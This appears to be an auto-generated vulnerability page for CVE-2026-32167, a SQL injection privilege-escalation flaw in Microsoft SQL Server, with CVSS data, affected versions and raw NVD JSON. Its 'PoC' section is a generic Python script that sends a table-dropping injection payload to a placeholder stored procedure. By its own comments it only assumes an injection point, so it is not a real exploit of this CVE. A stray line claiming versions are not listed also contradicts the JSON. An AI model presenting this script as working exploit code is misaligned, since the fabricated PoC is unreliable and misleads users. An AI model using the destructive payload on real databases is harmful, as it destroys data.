CVE-2026-32167

Description

Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score

6.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:sql_server_2016:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:a:microsoft:sql_server_2017:*:*:*:*:*:*:x64:* - VULNERABLE

cpe:2.3:a:microsoft:sql_server_2019:*:*:*:*:*:*:x64:* - VULNERABLE

Microsoft SQL Server (Specific versions not listed in provided text)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept for CVE-2026-32167
# Note: This requires high privileges (PR:H) and local access (AV:L).

import pyodbc

# Connect to the target SQL Server instance
server = 'TARGET_SERVER'
database = 'master'
username = 'high_priv_user'
password = 'password'
driver = '{ODBC Driver 17 for SQL Server}'

cnxn = pyodbc.connect(f'DRIVER={driver};SERVER={server};DATABASE={database};UID={username};PWD={password}')
cursor = cnxn.cursor()

# Vulnerable SQL command injection payload
# Assuming a vulnerable stored procedure or dynamic SQL execution point
payload = "'; EXECUTE AS USER = 'dbo'; DROP TABLE test_table; --"

try:
    # Simulating the injection point
    vulnerable_query = f"EXEC sp_vulnerable_procedure '{payload}'"
    cursor.execute(vulnerable_query)
    cnxn.commit()
    print("Payload executed successfully. Privilege escalation may have occurred.")
except Exception as e:
    print(f"Error: {e}")
finally:
    cnxn.close()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32167
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32167
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32167/
[4] VulDB https://vuldb.com/cve/CVE-2026-32167
[5] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32167

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32167", "sourceIdentifier": "[email protected]", "published": "2026-04-14T18:17:19.417", "lastModified": "2026-05-07T19:54:15.183", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2016:*:*:*:*:*:*:x64:*", "versionStartIncluding": "13.0.6300.2", "versionEndExcluding": "13.0.6485.1", "matchCriteriaId": "8BABE301-AB13-4B54-847B-F67EC92CD96C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2016:*:*:*:*:*:*:x64:*", "versionStartIncluding": "13.0.7000.253", "versionEndExcluding": "13.0.7080.1", "matchCriteriaId": "31FD6563-A0B9-48C9-BA0B-BF256BFC466D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2017:*:*:*:*:*:*:x64:*", "versionStartIncluding": "14.0.1000.169", "versionEndExcluding": "14.0.2105.1", "matchCriteriaId": "02D807B3-0DE8-4E79-AE5A-574AD32834D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2017:*:*:*:*:*:*:x64:*", "versionStartIncluding": "14.0.3006.16", "versionEndExcluding": "14.0.3525.1", "matchCriteriaId": "F8B94B39-1964-486F-9532-5557C87AFC87"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2019:*:*:*:*:*:*:x64:*", "versionStartIncluding": "15.0.2000.5", "versionEndExcluding": "15.0.2165.1", "matchCriteriaId": "EA4AB606-8B66-4C89-8773-4DA1E25FB2AB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2019:*:*:*:*:*:*:x64:*", "versionStartIncluding": "15.0.4003.23", "versionEndExcluding": "15.0.4465.1", "matchCriteriaId": "450ADCF3-0476-4CBE-A0F6-28AE90E9E874"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2022:*:*:*:*:*:*:x64:*", "versionStartIncluding": "16.0.1000.6", "versionEndExcluding": "16.0.1175.1", "matchCriteriaId": "FE44A0AE-ECDE-4348-923B-205C691E87DA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2022:*:*:*:*:*:*:x64:*", "versionStartIncluding": "16.0.4003.1", "versionEndExcluding": "16.0.4250.1", "matchCriteriaId": "4BFEE9EB-DB7B-490D-AF61-A0162F9FE782"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2025:*:*:*:*:*:*:x64:*", "versionStartIncluding": "17.0.1000.7", "versionEndExcluding": "17.0.1110.1", "matchCriteriaId": "FC0EA29C-9CF8-4ED7-B726-BBACF39DA1A8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sql_server_2025:*:*:*:*:*:*:x64:*", "versionStartIncluding": "17.0.4006.2", "versionEndExcluding": "17.0.4030.1", "matchCriteriaId": "8220A87D-84FB-43FA-8DF0-2B4D50E69164"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-32167", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}